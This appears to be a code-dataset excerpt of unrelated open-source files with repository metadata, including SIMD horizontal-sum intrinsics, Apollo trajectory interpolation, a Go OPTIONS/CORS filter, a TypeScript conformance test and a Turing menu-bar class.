        set totalsOffset $entToCellTotalsOffset($ent)
        set range [getCellEnumRange $totalsOffset]
        set entDims [utils::entGetDimensions $ent]
        set name "[utils::entGetName $ent] ($ent)"
        puts [format "| %3d | %6d | %6d | %15.15s | %10.10s | %-40.40s |" \
          $totalsOffset $entTot $runTot $range $entDims $name]
      }
    }
  }
}
}
# END SCRIPT
#
# DISCLAIMER:
# TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, POINTWISE DISCLAIMS
# ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED
# TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE, WITH REGARD TO THIS SCRIPT. TO THE MAXIMUM EXTENT PERMITTED
# BY APPLICABLE LAW, IN NO EVENT SHALL POINTWISE BE LIABLE TO ANY PARTY
# FOR ANY SPECIAL, INCIDENTAL, INDIRECT, OR CONSEQUENTIAL DAMAGES
# WHATSOEVER (INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF
# BUSINESS INFORMATION, OR ANY OTHER PECUNIARY LOSS) ARISING OUT OF THE
# USE OF OR INABILITY TO USE THIS SCRIPT EVEN IF POINTWISE HAS BEEN
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND REGARDLESS OF THE
# FAULT OR NEGLIGENCE OF POINTWISE.
#
| Glyph | 4 | smola/language-dataset | data/github.com/pointwise/GridCoordEnum/3807bade6eff04871e489562ae8587f59eb7de97/pwio.glf | [
"MIT"
] |
# Platform-specific build configurations.
"""
TF profiler build macros for use in OSS.
"""
load("//tensorflow:tensorflow.bzl", "cc_header_only_library")
def tf_profiler_alias(target_dir, name):
    """Builds the label for a profiler target inside the oss subpackage.

    Args:
      target_dir: Package path prefix the "oss" subpackage lives under.
      name: Target name within that subpackage.

    Returns:
      The label string "<target_dir>oss:<name>".
    """
    return "{}oss:{}".format(target_dir, name)
def tf_profiler_pybind_cc_library_wrapper(name, actual, **kwargs):
    """Wrapper for cc_library targets used by tf_python_pybind_extension.

    Exposes the headers of `actual` to pybind code without creating ODR
    violations in the dynamically linked case; the symbols in these deps
    should be linked to, and exported by, the core
    pywrap_tensorflow_internal.so.
    """
    cc_header_only_library(
        name = name,
        deps = [actual],
        **kwargs
    )
| Python | 4 | EricRemmerswaal/tensorflow | tensorflow/core/profiler/builds/oss/build_config.bzl | [
"Apache-2.0"
] |
name: hol-compatibility
version: 1.0
description: Interface between OpenTheory Standard Library and HOL4
author: Ramana Kumar <ramana@member.fsf.org>
license: GPL
requires: base
show: "Data.Bool"
bool {
package: hol-bool-1.0
}
sat {
import: bool
package: hol-sat-1.0
}
combin {
import: bool
package: hol-combin-1.0
}
main {
import: bool
import: sat
import: combin
}
| Isabelle | 3 | dwRchyngqxs/HOL | src/opentheory/compat/hol-compatibility.thy | [
"BSD-3-Clause"
] |
/*
 * myname2.lex : A sample Flex program
 * that does token replacement.
 *
 * Copies input to output, replacing the tokens %NAME, %HOST, %HOSTTYPE
 * and %HOME with the values of the LOGNAME, HOST, HOSTTYPE and HOME
 * environment variables. Text inside double quotes is echoed verbatim
 * (no replacement), handled by the exclusive STRING start condition.
 */
%{
#include <stdio.h>
%}
%x STRING
%%
\" ECHO; BEGIN(STRING);
<STRING>[^\"\n]* ECHO;
<STRING>\" ECHO; BEGIN(INITIAL);
%NAME { printf("%s",getenv("LOGNAME")); }
%HOST { printf("%s",getenv("HOST")); }
%HOSTTYPE { printf("%s",getenv("HOSTTYPE"));}
%HOME { printf("%s",getenv("HOME")); }
| Lex | 4 | DemiMarie/flex | examples/manual/myname2.lex | [
"BSD-4-Clause-UC"
] |
This category provides data and a methodology for the measurement and monitoring of greenhouse gas emissions resulting from the production of nitric acid (HNO,,3,,). The methodology is sourced from the WRI Greenhouse Gas protocol [[http://www.ghgprotocol.org/calculation-tools/all-tools|worksheets]] but ultimately follows the IPCC 2006 [[http://www.ipcc-nggip.iges.or.jp/public/2006gl/index.html|Guidelines for National Greenhouse Gas Inventories]]. This category represents //Tiers 1, 2 and 3// approaches of the IPCC guidelines.
N,,2,,O emissions from the production of nitric acid depend on the quantity of nitric acid produced, plant design, burner conditions and on the amount of N,,2,,O destroyed in any subsequent abatement process.
This methodology does not cover direct emissions from the combustion of fossil fuel occurring during the production of nitric acid, or indirect emissions from the purchase of energy used for nitric acid production.
----
==How to use this category==
===Selecting an emissions scenario===
Use the drill-down //**plantType**// to select the type of plant.
===Specifying activity data===
Specify the required profile item values listed below.
===Results and calculation===
The quantities returned represent the greenhouse gas emissions associated with the quantity and parameters specified. The following quantities are returned:
* //**N2O**//: absolute quantity of N,,2,,O emissions for the quantity specified
* //**CO2e**//: CO,,2,,e emissions (N,,2,,O emissions converted using the appropriate [[Greenhouse_gases_Global_warming_potentials|global warming potential]])
| Creole | 0 | OpenAMEE/datasets | business/processes/production/nitricAcid/documentation.creole | [
"MIT"
] |
// Copyright 2021 The Google Research Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef SCANN_UTILS_INTRINSICS_HORIZONTAL_SUM_H_
#define SCANN_UTILS_INTRINSICS_HORIZONTAL_SUM_H_
#include "scann/utils/intrinsics/simd.h"
namespace research_scann {
namespace fallback {

// Scalar fallback: a Simd<T> here wraps a single value, so the
// "horizontal sum" is just the wrapped value itself.
SCANN_INLINE float HorizontalSum(Simd<float> a) { return a.Unwrap(); }

SCANN_INLINE float HorizontalSum(Simd<double> a) { return a.Unwrap(); }

// Scalar fallback for the 2-way reduction; each result is the
// corresponding wrapped value.
template <typename FloatT>
SCANN_INLINE void HorizontalSum2X(Simd<FloatT> a, Simd<FloatT> b,
                                  FloatT* resulta, FloatT* resultb) {
  *resulta = a.Unwrap();
  *resultb = b.Unwrap();
}

// Scalar fallback for the 4-way reduction; each result is the
// corresponding wrapped value.
template <typename FloatT>
SCANN_INLINE void HorizontalSum4X(Simd<FloatT> a, Simd<FloatT> b,
                                  Simd<FloatT> c, Simd<FloatT> d,
                                  FloatT* resulta, FloatT* resultb,
                                  FloatT* resultc, FloatT* resultd) {
  *resulta = a.Unwrap();
  *resultb = b.Unwrap();
  *resultc = c.Unwrap();
  *resultd = d.Unwrap();
}

}  // namespace fallback
#ifdef __x86_64__
namespace sse4 {

// Sums the 4 float lanes of x. First add folds lanes {2,3} onto {0,1}
// (shuffle selects lanes 2,3,2,3); second add folds lane 1 onto lane 0.
// The full sum ends up in lane 0.
SCANN_INLINE float HorizontalSum(Sse4<float> x) {
  x += Sse4<float>(_mm_shuffle_ps(*x, *x, 0b11'10'11'10));
  x += Sse4<float>(_mm_shuffle_ps(*x, *x, 0b11'10'01'01));
  return x.GetLowElement();
}

// Sums the 2 double lanes of x by folding the high lane onto the low.
SCANN_INLINE double HorizontalSum(Sse4<double> x) {
  x += Sse4<double>(_mm_shuffle_pd(*x, *x, 0b1'1));
  return x.GetLowElement();
}

// 2-way reduction; no cross-register trick at 128 bits, so each input
// is reduced independently.
template <typename FloatT>
SCANN_INLINE void HorizontalSum2X(Sse4<FloatT> a, Sse4<FloatT> b,
                                  FloatT* resulta, FloatT* resultb) {
  *resulta = HorizontalSum(a);
  *resultb = HorizontalSum(b);
}

// 4-way reduction built from two 2-way reductions.
template <typename FloatT>
SCANN_INLINE void HorizontalSum4X(Sse4<FloatT> a, Sse4<FloatT> b,
                                  Sse4<FloatT> c, Sse4<FloatT> d,
                                  FloatT* resulta, FloatT* resultb,
                                  FloatT* resultc, FloatT* resultd) {
  HorizontalSum2X(a, b, resulta, resultb);
  HorizontalSum2X(c, d, resultc, resultd);
}

}  // namespace sse4
namespace avx1 {
SCANN_AVX1_INLINE float HorizontalSum(Avx1<float> a) {
Sse4<float> upper = _mm256_extractf128_ps(*a, 1);
Sse4<float> lower = _mm256_castps256_ps128(*a);
return sse4::HorizontalSum(upper + lower);
}
SCANN_AVX1_INLINE double HorizontalSum(Avx1<double> a) {
Sse4<double> upper = _mm256_extractf128_pd(*a, 1);
Sse4<double> lower = _mm256_castpd256_pd128(*a);
return sse4::HorizontalSum(upper + lower);
}
template <typename FloatT>
SCANN_AVX1_INLINE Avx1<FloatT> Sum128BitLanes(Avx1<FloatT> a, Avx1<FloatT> b) {
static_assert(IsSameAny<FloatT, float, double>());
constexpr int kDestLoEqALo = 0x00;
constexpr int kDestLoEqAHi = 0x01;
constexpr int kDestHiEqBLo = 0x20;
constexpr int kDestHiEqBHi = 0x30;
Avx1<FloatT> term0, term1;
if constexpr (IsSame<FloatT, float>()) {
term0 = _mm256_permute2f128_ps(*a, *b, kDestLoEqALo + kDestHiEqBLo);
term1 = _mm256_permute2f128_ps(*a, *b, kDestLoEqAHi + kDestHiEqBHi);
}
if constexpr (IsSame<FloatT, double>()) {
term0 = _mm256_permute2f128_pd(*a, *b, kDestLoEqALo + kDestHiEqBLo);
term1 = _mm256_permute2f128_pd(*a, *b, kDestLoEqAHi + kDestHiEqBHi);
}
return term0 + term1;
}
SCANN_AVX1_INLINE Avx1<float> Sum64BitLanes(Avx1<float> a, Avx1<float> b) {
auto term0 = _mm256_shuffle_ps(*a, *b, 0b11'10'01'00);
auto term1 = _mm256_shuffle_ps(*a, *b, 0b01'00'11'10);
return term0 + term1;
}
// Horizontally sums two 8-float registers at once. After Sum128BitLanes the
// low 128-bit lane holds a's partial sums and the high lane b's; the two
// shuffle-adds fold each lane's 4 floats down, leaving a's total in
// element 0 and b's total in element 4.
SCANN_AVX1_INLINE void HorizontalSum2X(Avx1<float> a, Avx1<float> b,
                                       float* resulta, float* resultb) {
  auto sum = *Sum128BitLanes(a, b);
  sum += _mm256_shuffle_ps(sum, sum, 0b11'10'11'10);
  sum += _mm256_shuffle_ps(sum, sum, 0b11'10'01'01);
  *resulta = sum[0];
  *resultb = sum[4];
}
// Horizontally sums three 8-float registers. a and c are lane-combined via
// Sum128BitLanes; b is folded onto itself by swapping its 128-bit halves
// (permute2f128 with control 1). Sum64BitLanes then interleaves the partial
// sums so a single shuffle-add leaves the totals at elements 0 (a), 2 (b)
// and 4 (c).
SCANN_AVX1_INLINE void HorizontalSum3X(Avx1<float> a, Avx1<float> b,
                                       Avx1<float> c, float* resulta,
                                       float* resultb, float* resultc) {
  Avx1<float> ac = Sum128BitLanes(a, c);
  Avx1<float> bg = b + Avx1<float>(_mm256_permute2f128_ps(*b, *b, 1));
  auto abcg = *Sum64BitLanes(ac, bg);
  abcg += _mm256_shuffle_ps(abcg, abcg, 0b11'11'01'01);
  *resulta = abcg[0];
  *resultb = abcg[2];
  *resultc = abcg[4];
}
// Horizontally sums four 8-float registers with shared shuffle work:
// lane-combine (a,c) and (b,d), interleave the pair sums via Sum64BitLanes,
// then one final shuffle-add leaves the four totals at elements 0 (a),
// 2 (b), 4 (c) and 6 (d).
SCANN_AVX1_INLINE void HorizontalSum4X(Avx1<float> a, Avx1<float> b,
                                       Avx1<float> c, Avx1<float> d,
                                       float* resulta, float* resultb,
                                       float* resultc, float* resultd) {
  Avx1<float> ac = Sum128BitLanes(a, c);
  Avx1<float> bd = Sum128BitLanes(b, d);
  auto abcd = *Sum64BitLanes(ac, bd);
  abcd += _mm256_shuffle_ps(abcd, abcd, 0b11'11'01'01);
  *resulta = abcd[0];
  *resultb = abcd[2];
  *resultc = abcd[4];
  *resultd = abcd[6];
}
// Horizontally sums two 4-double registers. After Sum128BitLanes each
// 128-bit lane needs only one more fold: shuffle_pd swaps the two doubles
// in each lane. a's total lands in element 0, b's in element 2.
SCANN_AVX1_INLINE void HorizontalSum2X(Avx1<double> a, Avx1<double> b,
                                       double* resulta, double* resultb) {
  auto sum = *Sum128BitLanes(a, b);
  sum += _mm256_shuffle_pd(sum, sum, 0b11'11);
  *resulta = sum[0];
  *resultb = sum[2];
}
// Reduces four 4-double registers by delegating pairwise to the 2X variant
// above; no additional cross-register sharing is attempted for doubles.
SCANN_AVX1_INLINE void HorizontalSum4X(Avx1<double> a, Avx1<double> b,
                                       Avx1<double> c, Avx1<double> d,
                                       double* resulta, double* resultb,
                                       double* resultc, double* resultd) {
  HorizontalSum2X(a, b, resulta, resultb);
  HorizontalSum2X(c, d, resultc, resultd);
}
} // namespace avx1
namespace avx2 {
// The AVX1 implementations are reused unchanged for AVX2 targets; no
// AVX2-specific horizontal-sum variants are defined.
using ::research_scann::avx1::HorizontalSum;
using ::research_scann::avx1::HorizontalSum2X;
using ::research_scann::avx1::HorizontalSum3X;
using ::research_scann::avx1::HorizontalSum4X;
}  // namespace avx2
namespace avx512 {
// AVX-512 exposes whole-register reduce-add intrinsics, so each reduction
// is a single intrinsic call and the 2X/4X variants simply reduce each
// input independently.
SCANN_AVX512_INLINE float HorizontalSum(Avx512<float> a) {
  return _mm512_reduce_add_ps(*a);
}
SCANN_AVX512_INLINE double HorizontalSum(Avx512<double> a) {
  return _mm512_reduce_add_pd(*a);
}
SCANN_AVX512_INLINE void HorizontalSum2X(Avx512<float> a, Avx512<float> b,
                                         float* resulta, float* resultb) {
  *resulta = _mm512_reduce_add_ps(*a);
  *resultb = _mm512_reduce_add_ps(*b);
}
SCANN_AVX512_INLINE void HorizontalSum2X(Avx512<double> a, Avx512<double> b,
                                         double* resulta, double* resultb) {
  *resulta = _mm512_reduce_add_pd(*a);
  *resultb = _mm512_reduce_add_pd(*b);
}
SCANN_AVX512_INLINE void HorizontalSum4X(Avx512<float> a, Avx512<float> b,
                                         Avx512<float> c, Avx512<float> d,
                                         float* resulta, float* resultb,
                                         float* resultc, float* resultd) {
  *resulta = _mm512_reduce_add_ps(*a);
  *resultb = _mm512_reduce_add_ps(*b);
  *resultc = _mm512_reduce_add_ps(*c);
  *resultd = _mm512_reduce_add_ps(*d);
}
SCANN_AVX512_INLINE void HorizontalSum4X(Avx512<double> a, Avx512<double> b,
                                         Avx512<double> c, Avx512<double> d,
                                         double* resulta, double* resultb,
                                         double* resultc, double* resultd) {
  *resulta = _mm512_reduce_add_pd(*a);
  *resultb = _mm512_reduce_add_pd(*b);
  *resultc = _mm512_reduce_add_pd(*c);
  *resultd = _mm512_reduce_add_pd(*d);
}
}  // namespace avx512
#endif
} // namespace research_scann
#endif
| C | 4 | xxdreck/google-research | scann/scann/utils/intrinsics/horizontal_sum.h | [
"Apache-2.0"
] |
(defun starts-with (search-in search-for)
  "Determine whether SEARCH-IN starts with SEARCH-FOR."
  ;; Docstring fixed: it previously referred to a nonexistent parameter `str`.
  (declare (string search-in)
           (string search-for))
  ;; The length guard keeps :end1 within SEARCH-IN's bounds; STRING= with
  ;; :end1 then compares only the prefix of SEARCH-IN against SEARCH-FOR.
  (and (<= (length search-for) (length search-in))
       (string= search-in search-for :end1 (length search-for))))
| Common Lisp | 4 | xsoheilalizadeh/FrameworkBenchmarks | frameworks/Lisp/woo/helpers/starts-with.lisp | [
"BSD-3-Clause"
] |
// Error for construct signature overloads to differ only by return type
class C {
constructor(x: number) { }
}
class C2<T> {
constructor(x: T, y?: string) { }
}
interface I {
new(x: number, y: string): C;
new(x: number, y: string): C2<number>; // error
}
interface I2<T> {
new (x: T, y: string): C2<number>;
new (x: T, y: string): C; // error
new <T>(x: T, y: string): C2<T>;
new <T>(x: T, y: string): C; // error
}
var a: {
new (x: number, y: string): C2<number>;
new (x: number, y: string): C; // error
}
var b: {
new <T>(x: T, y: string): C2<T>;
new <T>(x: T, y: string): C; // error
} | TypeScript | 4 | nilamjadhav/TypeScript | tests/cases/conformance/types/objectTypeLiteral/constructSignatures/constructSignaturesWithOverloadsThatDifferOnlyByReturnType.ts | [
"Apache-2.0"
] |
/******************************************************************************
* Copyright 2017 The Apollo Authors. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*****************************************************************************/
#include "modules/common/math/linear_interpolation.h"
#include <cmath>
#include "cyber/common/log.h"
#include "modules/common/math/math_utils.h"
namespace apollo {
namespace common {
namespace math {
// Shortest-path interpolation of an angle: blends between a0 (at time t0)
// and a1 (at time t1), evaluated at time t, always traveling along the
// shorter arc around the circle. The result is passed through
// NormalizeAngle().
double slerp(const double a0, const double t0, const double a1, const double t1,
             const double t) {
  // Degenerate interval: avoid dividing by ~0 below; fall back to the
  // (normalized) first angle.
  if (std::abs(t1 - t0) <= kMathEpsilon) {
    ADEBUG << "input time difference is too small";
    return NormalizeAngle(a0);
  }
  const double a0_n = NormalizeAngle(a0);
  const double a1_n = NormalizeAngle(a1);
  // Wrap the angular difference into [-pi, pi] so the blend follows the
  // shorter direction.
  double d = a1_n - a0_n;
  if (d > M_PI) {
    d = d - 2 * M_PI;
  } else if (d < -M_PI) {
    d = d + 2 * M_PI;
  }
  // r is the normalized time; it is not clamped, so t outside [t0, t1]
  // extrapolates.
  const double r = (t - t0) / (t1 - t0);
  const double a = a0_n + d * r;
  return NormalizeAngle(a);
}
// Linearly blends the s and l coordinates of two SLPoints with weight w
// (w = 0 yields p0, w = 1 yields p1). Note only the lower bound of w is
// CHECK'd; w > 1 silently extrapolates beyond p1.
SLPoint InterpolateUsingLinearApproximation(const SLPoint &p0,
                                            const SLPoint &p1, const double w) {
  CHECK_GE(w, 0.0);

  SLPoint p;
  p.set_s((1 - w) * p0.s() + w * p1.s());
  p.set_l((1 - w) * p0.l() + w * p1.l());
  return p;
}
// Interpolates a PathPoint at arc length s between p0 (at p0.s()) and p1
// (at p1.s()). Position, curvature and its derivatives are blended
// linearly; heading (theta) uses shortest-arc interpolation via slerp().
// The weight is not clamped, so s outside [p0.s(), p1.s()] extrapolates.
PathPoint InterpolateUsingLinearApproximation(const PathPoint &p0,
                                              const PathPoint &p1,
                                              const double s) {
  double s0 = p0.s();
  double s1 = p1.s();

  PathPoint path_point;
  // Guard against division by zero when the two points are (nearly)
  // coincident in arc length, mirroring the small-interval handling in
  // slerp() above: fall back to the first point at the requested s.
  if (std::abs(s1 - s0) <= kMathEpsilon) {
    path_point = p0;
    path_point.set_s(s);
    return path_point;
  }
  double weight = (s - s0) / (s1 - s0);
  double x = (1 - weight) * p0.x() + weight * p1.x();
  double y = (1 - weight) * p0.y() + weight * p1.y();
  double theta = slerp(p0.theta(), p0.s(), p1.theta(), p1.s(), s);
  double kappa = (1 - weight) * p0.kappa() + weight * p1.kappa();
  double dkappa = (1 - weight) * p0.dkappa() + weight * p1.dkappa();
  double ddkappa = (1 - weight) * p0.ddkappa() + weight * p1.ddkappa();
  path_point.set_x(x);
  path_point.set_y(y);
  path_point.set_theta(theta);
  path_point.set_kappa(kappa);
  path_point.set_dkappa(dkappa);
  path_point.set_ddkappa(ddkappa);
  path_point.set_s(s);
  return path_point;
}
// Interpolates a full TrajectoryPoint at relative time t between tp0 and
// tp1. Velocity, acceleration, position and curvature terms are lerped in
// time; heading and steering angle use shortest-arc slerp. If either input
// lacks a path_point, a default-constructed point is returned.
TrajectoryPoint InterpolateUsingLinearApproximation(const TrajectoryPoint &tp0,
                                                    const TrajectoryPoint &tp1,
                                                    const double t) {
  if (!tp0.has_path_point() || !tp1.has_path_point()) {
    // Degenerate input: return an empty point rather than interpolating
    // against missing data.
    TrajectoryPoint p;
    p.mutable_path_point()->CopyFrom(PathPoint());
    return p;
  }
  const PathPoint pp0 = tp0.path_point();
  const PathPoint pp1 = tp1.path_point();
  double t0 = tp0.relative_time();
  double t1 = tp1.relative_time();

  TrajectoryPoint tp;
  tp.set_v(lerp(tp0.v(), t0, tp1.v(), t1, t));
  tp.set_a(lerp(tp0.a(), t0, tp1.a(), t1, t));
  tp.set_relative_time(t);
  // Steering is an angle, so it is slerped like theta below.
  tp.set_steer(slerp(tp0.steer(), t0, tp1.steer(), t1, t));

  PathPoint *path_point = tp.mutable_path_point();
  path_point->set_x(lerp(pp0.x(), t0, pp1.x(), t1, t));
  path_point->set_y(lerp(pp0.y(), t0, pp1.y(), t1, t));
  path_point->set_theta(slerp(pp0.theta(), t0, pp1.theta(), t1, t));
  path_point->set_kappa(lerp(pp0.kappa(), t0, pp1.kappa(), t1, t));
  path_point->set_dkappa(lerp(pp0.dkappa(), t0, pp1.dkappa(), t1, t));
  path_point->set_ddkappa(lerp(pp0.ddkappa(), t0, pp1.ddkappa(), t1, t));
  path_point->set_s(lerp(pp0.s(), t0, pp1.s(), t1, t));

  return tp;
}
} // namespace math
} // namespace common
} // namespace apollo
| C++ | 5 | seeclong/apollo | modules/common/math/linear_interpolation.cc | [
"Apache-2.0"
] |
#include "script_component.hpp"
/*
Name: TFAR_fnc_onSpeakVolumeModifierPressed
Author: ACyprus
Transiently changes the volume for the player's voice in game to either Yelling or Whisper
Arguments:
0: Volume level : VALUES ("yelling" or "whispering") <STRING>
Return Value:
Whether or not the event was handled <BOOL>
Example:
["yelling"] call TFAR_fnc_onSpeakVolumeModifierPressed;
Public: No
*/
params ["_modifierMode"];

// Only these two modes are accepted; anything else is ignored below.
private _allowedModes = ["yelling", "whispering"];

// Ignore the keypress while dead or while a radio transmit key is held.
if(!alive TFAR_currentUnit || TF_tangent_sw_pressed || TF_tangent_lr_pressed) exitWith {false};
if!(_modifierMode in _allowedModes) exitWith {false};

// Remember the previous volume so it can be restored on key release.
TF_last_speak_volume_level = TF_speak_volume_level;
TF_last_speak_volume_meters = TF_speak_volume_meters;

TF_speak_volume_level = _modifierMode;
if(_modifierMode == "yelling") then {
    TF_speak_volume_meters = TF_max_voice_volume;
} else {
    TF_speak_volume_meters = TF_min_voice_volume;
};

/* Tell the plugin that we just changed our volume
  We can't wait for the normal sendFreqInfo interval because the Plugin has to
  know the change before we start transmitting
*/
call TFAR_fnc_sendFrequencyInfo;

// Build the localized on-screen hint text for the selected mode.
private _localName = localize format[LSTRING(voice_%1), _modifierMode];
private _hintText = format[localize LSTRING(voice_volume), _localName];

if (TFAR_oldVolumeHint) then {
    if (TFAR_volumeModifier_forceSpeech) then {
        [_hintText,format["TANGENT PRESSED %1 %2 %3","directSpeechFreq", 0, "directSpeech"],-1] call TFAR_fnc_processTangent;
    } else {
        [parseText (_hintText), -1] call TFAR_fnc_showHint;
    };
} else {
    if (!TFAR_ShowVolumeHUD) then {
        (QGVAR(HUDVolumeIndicatorRsc) call BIS_fnc_rscLayer) cutRsc [QGVAR(HUDVolumeIndicatorRsc), "PLAIN", 0, true]; //Hidden in the Released handler
    };
    if (TFAR_volumeModifier_forceSpeech) then {
        ["",format["TANGENT PRESSED %1 %2 %3","directSpeechFreq", 0, "directSpeech"],0] call TFAR_fnc_processTangent;
    };
};

call TFAR_fnc_updateSpeakVolumeUI;
// Notify any registered listeners about the volume change.
["OnSpeakVolumeModifierPressed", [TFAR_currentUnit, TF_speak_volume_level, TF_speak_volume_meters]] call TFAR_fnc_fireEventHandlers;

// Return true: the keypress was handled.
true
| SQF | 5 | MrDj200/task-force-arma-3-radio | addons/core/functions/events/keys/fnc_onSpeakVolumeModifierPressed.sqf | [
"RSA-MD"
] |
package restful
import "strings"
// Copyright 2013 Ernest Micklei. All rights reserved.
// Use of this source code is governed by a license
// that can be found in the LICENSE file.
// OPTIONSFilter is a filter function that inspects the Http Request for the OPTIONS method
// and provides the response with a set of allowed methods for the request URL Path.
// As for any filter, you can also install it for a particular WebService within a Container.
// Note: this filter is not needed when using CrossOriginResourceSharing (for CORS).
// OPTIONSFilter is a filter function that inspects the Http Request for the
// OPTIONS method and provides the response with a set of allowed methods for
// the request URL Path. As for any filter, you can also install it for a
// particular WebService within a Container.
// Note: this filter is not needed when using CrossOriginResourceSharing (for CORS).
func (c *Container) OPTIONSFilter(req *Request, resp *Response, chain *FilterChain) {
	if req.Request.Method != "OPTIONS" {
		// Not an OPTIONS request; pass it along to the next filter.
		chain.ProcessFilter(req, resp)
		return
	}

	requestedHeaders := req.Request.Header.Get(HEADER_AccessControlRequestHeaders)
	allowedMethods := strings.Join(c.computeAllowedMethods(req), ",")
	requestOrigin := req.Request.Header.Get(HEADER_Origin)

	resp.AddHeader(HEADER_Allow, allowedMethods)
	resp.AddHeader(HEADER_AccessControlAllowOrigin, requestOrigin)
	resp.AddHeader(HEADER_AccessControlAllowHeaders, requestedHeaders)
	resp.AddHeader(HEADER_AccessControlAllowMethods, allowedMethods)
}
// OPTIONSFilter is a filter function that inspects the Http Request for the OPTIONS method
// and provides the response with a set of allowed methods for the request URL Path.
// It returns the DefaultContainer's OPTIONSFilter so it can be installed globally.
// Note: this filter is not needed when using CrossOriginResourceSharing (for CORS).
func OPTIONSFilter() FilterFunction {
	return DefaultContainer.OPTIONSFilter
}
| Go | 4 | pkoushik/ARO-RP | vendor/github.com/emicklei/go-restful/options_filter.go | [
"Apache-2.0"
] |
-- Copyright 2014-2015 The Howl Developers
-- License: MIT (see LICENSE.md at the top-level directory of the distribution)
require 'ljglibs.gio.output_stream'
core = require 'ljglibs.core'
-- Register GFileOutputStream as a class deriving from GOutputStream; no
-- members are added beyond what the parent class provides.
core.define 'GFileOutputStream < GOutputStream', {
}
| MoonScript | 4 | felipetavares/folt-howl | lib/ljglibs/gio/file_output_stream.moon | [
"MIT"
] |
#version 3.6;
#include "colors.inc"
#include "metals.inc"
#include "textures.inc"
camera {
location <0,-50,15>
sky z
right -0.25*x*image_width/image_height
up 0.25*y
look_at <0,0,0>
}
background{rgb 1}
light_source{<-16,-30,30> color rgb <0.77,0.75,0.75>}
light_source{<25,-16,8> color rgb <0.43,0.45,0.45>}
#declare r=0.05;
#declare s=0.5;
#declare particles=union {
#include "irregular_p.pov"
pigment{rgb 0.9} finish{reflection 0.2 specular 0.25 ambient 0.28 metallic}
}
union{particles translate <-4,0,0>}
union{particles translate <4,0,0>}
union{
#include "irregular_v.pov"
translate <4,0,0>
pigment{rgb <0.7,0.3,0.9>} finish{specular 0.5 ambient 0.42}
}
| POV-Ray SDL | 4 | wgq-iapcm/Parvoro- | 3rdparty/voro++-0.4.6/examples/extra/irregular.pov | [
"BSD-3-Clause"
] |
unit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% MenuBarClass - Class that implements menus in OOT.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The external interface of MenuBarClass empty. The MenuBarClass should not
% be used directly by external programs.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The package interface of MenuBarClass is as follows:
% procedure AddMenu (menu, afterMenu : ^MenuClass) - Add a MenuClass object
% to the menu bar. Place
% it after afterMenu.
% procedure AppendMenu (menu : ^MenuClass) - Add a MenuClass object to the
% menu bar after all other menus.
% function ConsiderButtonDown (x, y : int) : boolean
% x, y - The location of of the mouse when the button
% was pressed.
% Handle the mouse button being pressed. If it occured
% in the menu bar, handle the event. Return true if the
% event is handled by this function. Return false
% otherwise. If a menu item was selected, call the
% actionProc for the menu item.
% function ConsiderKeystroke (key : char) : boolean
% key - The key pressed.
% Handle a keystroke. If the keystroke is the
% shortcut for a menu item, the actionProc for the
% menu item is called and the function returns true,
% otherwise it returns false.
% function GetLastMenu : ^MenuClass - Return the last menu added to the menu
% bar.
% function GetSelectedMenuItem : ^WidgetClass - Return the currently
% selected menu item. Used
% by the GUI module to get the
% id of the menu item.
% procedure Hide - Hide the menu bar.
% procedure Show - Display the menu bar.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The inheritable subprograms of MenuBarClass are as follows:
% procedure AssertFailed (msg : string) - Quit program with error message.
% procedure DrawBar - Draw the menu bar.
% function FindMenu (x : int) : ^MenuClass - Return the menu which is found
% at position (x, maxy) in the
% menu bar.
% procedure Initialize - Initialize the menu bar.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The inheritable variables of MenuBarClass are as follows:
% initialized - Whether the menu bar has been initialized.
% showing - Whether the menu bar is currently visible.
% menuLine - The y coordinate of the bottom of the menu bar.
% selectedMenu - The currently selected menu.
% firstMenuNode - the first in the linked list of MenuNodes.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
class MenuBarClass
import MenuClass, GenericWidgetClass, WidgetGlobals
export
% The package interface
AddMenu, AppendMenu, ConsiderButtonDown, ConsiderKeystroke,
GetLastMenu, Hide, Show
%
% The inheritable types of MenuBarClass
%
type MenuNode :
record
menu : ^MenuClass
next : ^MenuNode
end record
%
% The inhertiable variables of MenuBarClass
%
var initialized : boolean := false
var showing : boolean := true
var menuLine : int
var selectedMenu : ^MenuClass
var firstMenuNode : ^MenuNode
%
% The inheritable subprograms of MenuBarClass
%
procedure AssertFailed (msg : string)
Window.Select (defWinId)
locate (1, 1)
put msg
assert false
end AssertFailed
    % Redraw the whole menu bar: border lines, background strip, and every
    % menu title. Does nothing unless the bar is initialized and visible.
    procedure DrawBar
